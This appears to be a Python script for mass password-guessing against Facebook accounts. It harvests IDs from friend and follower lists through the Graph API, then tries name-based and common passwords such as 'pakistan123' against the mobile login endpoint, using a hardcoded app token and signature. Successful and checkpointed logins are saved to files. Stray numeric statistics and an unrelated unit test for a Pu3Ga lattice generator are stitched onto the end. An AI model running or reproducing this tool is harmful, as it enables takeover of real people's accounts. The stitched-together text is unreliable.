params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass1, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass1+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass1+"\n")
ok.close()
oks.append(uid+pass1)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass1+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass1+"\n")
cp.close()
cps.append(uid+pass1)
else:
pass2 = name.lower().split(' ')[0] + '007'
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass2, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass2+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass2+"\n")
ok.close()
oks.append(uid+pass2)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AZIM-CP] "+uid+" | "+pass2+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass2+"\n")
cp.close()
cps.append(uid+pass2)
else:
pass3 = name.lower().split(' ')[0] + 'khan'
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass3, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass3+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass3+"\n")
ok.close()
oks.append(uid+pass3)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass3+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass3+"\n")
cp.close()
cps.append(uid+pass3)
else:
pass4 = name.lower().split(' ')[1] + 'khan123'
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass4, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass4+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass4+"\n")
ok.close()
oks.append(uid+pass4)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass4+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass4+"\n")
cp.close()
cps.append(uid+pass4)
else:
pass5 = name.lower().split(' ')[1] + '321'
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass5, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass5+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass5+"\n")
ok.close()
oks.append(uid+pass5)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass5+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass5+"\n")
cp.close()
cps.append(uid+pass5)
else:
pass6 = name.lower().split(' ')[1] + 'ali'
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass6, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass6+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass6+"\n")
ok.close()
oks.append(uid+pass6)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass6+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass6+"\n")
cp.close()
cps.append(uid+pass6)
else:
pass7 = name.lower()
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass7, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass7+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass7+"\n")
ok.close()
oks.append(uid+pass7)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass7+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass7+"\n")
cp.close()
cps.append(uid+pass7)
else:
pass8 = name.lower().split(' ')[0] + name.lower().split(' ')[1]
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass8, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass8+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass8+"\n")
ok.close()
oks.append(uid+pass8)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass8+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass8+"\n")
cp.close()
cps.append(uid+pass8)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print("")
linex()
print("")
print("\033[92;1m THE PROCESS HAS BEEN COMPLETED")
print("\033[93;1m TOTAL \033[92;1mOK\033[93;1m/\033[91;1mCP: "+str(len(oks))+"/"+str(len(cps)))
print("")
linex()
print("")
raw_input("\033[93;1m PRESS ENTER TO BACK ")
menu()
global token
os.system("clear")
try:
token = open("vau_token.txt","r").read()
except IOError:
print("")
print("\t\033[91;1m TOKEN NOT FOUND ")
time.sleep(1)
fb_token()
os.system("clear")
logo()
print("")
print("\t\033[93;1m DIGIT PASS CRACKING")
print("")
print("\033[94;1m [1] CRACK PUBLIC ID")
print("\033[93;1m [2] CRACK FOLLOWERS")
print("\033[92;1m [3] CRACK FILE")
print("")
crack_select()
select = raw_input("\033[92;1m CHOOSE : ")
id=[]
oks=[]
cps=[]
if select =="1":
os.system("clear")
logo()
print("")
print("\t\033[93;1m DIGIT PASS CRACKING")
print("")
try:
id_limit = int(raw_input("\033[93;1m ENTER LIMIT (\033[91;1m5 MAX\033[93;1m): \033[92;1m"))
print("")
except:id_limit=1
for t in range(id_limit):
t +=1
idt = raw_input("\033[93;1m INPUT PUBLIC ID (\033[92;1m%s\033[93;1m) : \033[92;1m"%(t))
try:
for i in requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token).json()["data"]:
uid = i["id"].encode('utf-8')
na = i["name"].encode('utf-8')
id.append(uid+"|"+na)
except KeyError:
print("\033[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE")
print("\033[94;1m TOTAL IDS : \033[0;92m%s\033[0;97m"%(len(id)))
time.sleep(3)
elif select =="2":
os.system("clear")
logo()
print("")
print("\t\033[93;1m DIGIT PASS CRACKING")
print("")
try:
id_limit = int(raw_input("\033[93;1m ENTER LIMIT (\033[91;1m5 MAX\033[93;1m): \033[92;1m"))
print("")
except:id_limit=1
for t in range(id_limit):
t +=1
idt = raw_input("\033[93;1m INPUT FOLLOWER ID (\033[92;1m%s\033[93;1m) : \033[92;1m"%(t))
try:
for i in requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+token+"&limit=999999").json()["data"]:
uid = i["id"].encode('utf-8')
na = i["name"].encode('utf-8')
id.append(uid+"|"+na)
except KeyError:
print("\033[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE")
print("\033[94;1m TOTAL IDS : \033[0;92m%s\033[0;97m"%(len(id)))
time.sleep(3)
elif select =="3":
os.system("clear")
logo()
print("")
print("\t\033[93;1m DIGIT PASS CRACKING")
print("")
filelist = raw_input('\033[92;1m INPUT FILE: ')
try:
for line in open(filelist, 'r').readlines():
id.append(line.strip())
except IOError:
print("\t\033[91;1m REQUESTED FILE NOT FOUND")
print("")
raw_input("\033[93;1m PRESS ENTER TO BACK")
crack()
elif select =="0":
menu()
else:
print("")
print("\t\033[91;1m SELECT VALID OPTION")
print("")
crack_select()
os.system("clear")
logo()
print("")
print("\033[93;1m TOTAL IDS : \033[92;1m"+str(len(id)))
print("\033[92;1m BRUTE HAS BEEN STARTED\x1b[0m")
linex()
def main(arg):
user=arg
uid,name=user.split("|")
_azimua = random.choice(["Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/275.0.0.49.127;]", "[FBAN/FB4A;FBAV/246.0.0.49.121;FBBV/181448449;FBDM/{density=1.5,width=540,height=960};FBLC/en_US;FBRV/183119516;FBCR/TM;FBMF/vivo;FBBD/vivo;FBPN/com.facebook.katana;FBDV/vivo 1606;FBSV/6.0.1;FBOP/1;FBCA/armeabi-v7a:armeabi;]", "Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-J320F Build/LMY47V) [FBAN/FB4A;FBAV/43.0.0.29.147;FBPN/com.facebook.katana;FBLC/en_GB;FBBV/14274161;FBCR/Tele2 LT;FBMF/samsung;FBBD/samsung;FBDV/SM-J320F;FBSV/5.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=1920};FB_FW/1;]", "Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/305.1.0.40.120;]", "Mozilla/5.0 (Linux; Android 10; REALME RMX1911 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 AlohaBrowser/2.20.3", "Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E216 [FBAN/FBIOS;FBAV/170.0.0.60.91;FBBV/105964764;FBDV/iPhone10,1;FBMD/iPhone;FBSN/iOS;FBSV/11.3;FBSS/2;FBCR/Sprint;FBID/phone;FBLC/en_US;FBOP/5;FBRV/106631002]", "Mozilla/5.0 (Linux; Android 7.1.1; ASUS Chromebook Flip C302 Build/R70-11021.56.0; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]"])
try:
pass1 = "balochistan"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass1, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass1+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass1+"\n")
ok.close()
oks.append(uid+pass1)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass1+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass1+"\n")
cp.close()
cps.append(uid+pass1)
else:
pass2 = "yaalimadad"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass2, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass2+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass2+"\n")
ok.close()
oks.append(uid+pass2)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass2+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass2+"\n")
cp.close()
cps.append(uid+pass2)
else:
pass3 = "pakistan123"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass3, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass3+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass3+"\n")
ok.close()
oks.append(uid+pass3)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass3+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass3+"\n")
cp.close()
cps.append(uid+pass3)
else:
pass4 = "khankhan"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass4, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass4+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass4+"\n")
ok.close()
oks.append(uid+pass4)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass4+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass4+"\n")
cp.close()
cps.append(uid+pass4)
else:
pass5 = "786110"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass5, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass5+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass5+"\n")
ok.close()
oks.append(uid+pass5)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass5+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass5+"\n")
cp.close()
cps.append(uid+pass5)
else:
pass6 = "khan1234"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass6, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass6+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass6+"\n")
ok.close()
oks.append(uid+pass6)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass6+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass6+"\n")
cp.close()
cps.append(uid+pass6)
else:
pass7 = "baloch1234"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass7, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass7+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass7+"\n")
ok.close()
oks.append(uid+pass7)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass7+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass7+"\n")
cp.close()
cps.append(uid+pass7)
except:
pass
p = ThreadPool()
p.map(main, id)
print("")
linex()
print("")
print("\033[92;1m THE PROCESS HAS BEEN COMPLETED")
print("\033[93;1m TOTAL \033[92;1mOK\033[93;1m/\033[91;1mCP: "+str(len(oks))+"/"+str(len(cps)))
print("")
linex()
print("")
raw_input("\033[93;1m PRESS ENTER TO BACK ")
menu()
if __name__ == '__main__':
main()
| 26.42268
| 1,581
| 0.595089
| 5,119
| 35,882
| 4.124438
| 0.095526
| 0.012788
| 0.027708
| 0.026998
| 0.897741
| 0.890494
| 0.875006
| 0.86847
| 0.866007
| 0.860702
| 0
| 0.132733
| 0.202135
| 35,882
| 1,357
| 1,582
| 26.442152
| 0.604736
| 0
| 0
| 0.856467
| 0
| 0.053628
| 0.456279
| 0.16188
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.206625
| 0.003155
| null | null | 0.22082
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
e6be894e085ab9552de67a627a0d6f2950224567
| 7,104
|
py
|
Python
|
atoman/lattice_gen/tests/test_lattice_gen_pu3ga.py
|
chrisdjscott/Atoman
|
e87ac31bbdcf53bb8f3efdfb109787d604890394
|
[
"MIT"
] | 9
|
2015-11-23T12:13:34.000Z
|
2021-11-18T05:23:35.000Z
|
atoman/lattice_gen/tests/test_lattice_gen_pu3ga.py
|
chrisdjscott/Atoman
|
e87ac31bbdcf53bb8f3efdfb109787d604890394
|
[
"MIT"
] | 1
|
2017-07-17T20:27:50.000Z
|
2017-07-23T05:27:15.000Z
|
atoman/lattice_gen/tests/test_lattice_gen_pu3ga.py
|
chrisdjscott/Atoman
|
e87ac31bbdcf53bb8f3efdfb109787d604890394
|
[
"MIT"
] | 4
|
2015-11-23T12:13:37.000Z
|
2017-05-03T08:24:19.000Z
|
"""
Unit tests for the Pu-Ga (Pu3Ga method) lattice generator
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import unittest
import numpy as np
from ...system.lattice import Lattice
from .. import lattice_gen_pu3ga
################################################################################
class TestLatticeGenPu3Ga(unittest.TestCase):
"""
Test Pu-Ga (Pu3Ga method) lattice generator
"""
def setUp(self):
    """Create a fresh Pu3Ga lattice generator before each test."""
    self.generator = lattice_gen_pu3ga.Pu3GaLatticeGenerator()
def tearDown(self):
    """Drop the generator reference so no state leaks between tests."""
    self.generator = None
def test_latticeGenPu3GaPBC(self):
    """
    Pu3Ga lattice generator (PBCs)

    Generates a 2x2x2-cell lattice (a0=3.0) with periodic boundaries in
    all three directions at two Ga concentrations (5% and 2%) and checks
    status, atom positions, species bookkeeping and cell dimensions.
    """
    # Expected atom positions (flat x,y,z triplets) for a 2x2x2 cell, a0=3.0.
    # Positions are independent of the Ga percentage, so one array serves
    # both concentration checks below.
    pos = np.asarray([ 0. , 0. , 0. , 0. , 1.5, 1.5, 1.5, 0. , 1.5, 1.5, 1.5,
                       0. , 0. , 0. , 3. , 0. , 1.5, 4.5, 1.5, 0. , 4.5, 1.5,
                       1.5, 3. , 0. , 3. , 0. , 0. , 4.5, 1.5, 1.5, 3. , 1.5,
                       1.5, 4.5, 0. , 0. , 3. , 3. , 0. , 4.5, 4.5, 1.5, 3. ,
                       4.5, 1.5, 4.5, 3. , 3. , 0. , 0. , 3. , 1.5, 1.5, 4.5,
                       0. , 1.5, 4.5, 1.5, 0. , 3. , 0. , 3. , 3. , 1.5, 4.5,
                       4.5, 0. , 4.5, 4.5, 1.5, 3. , 3. , 3. , 0. , 3. , 4.5,
                       1.5, 4.5, 3. , 1.5, 4.5, 4.5, 0. , 3. , 3. , 3. , 3. ,
                       4.5, 4.5, 4.5, 3. , 4.5, 4.5, 4.5, 3. ])
    numatom = 32

    def checkLattice(percGa):
        # Generate at the given Ga percentage and verify all invariants.
        # (This was previously duplicated verbatim for each percentage.)
        args = lattice_gen_pu3ga.Args(percGa=percGa, NCells=[2, 2, 2], a0=3.0,
                                      pbcx=True, pbcy=True, pbcz=True)
        status, lattice = self.generator.generateLattice(args)
        # expected Ga count: integer truncation of percGa% of the atom total
        gacnt = int(args.percGa * 0.01 * float(numatom))
        self.assertEqual(status, 0)
        self.assertIsInstance(lattice, Lattice)
        self.assertEqual(lattice.NAtoms, numatom)
        self.assertTrue(np.allclose(lattice.pos, pos))
        self.assertEqual(len(lattice.specieList), 2)
        self.assertEqual(lattice.specieList[0], "Pu")
        self.assertEqual(lattice.specieList[1], "Ga")
        self.assertEqual(len(lattice.specieCount), 2)
        self.assertEqual(lattice.specieCount[0], numatom - gacnt)
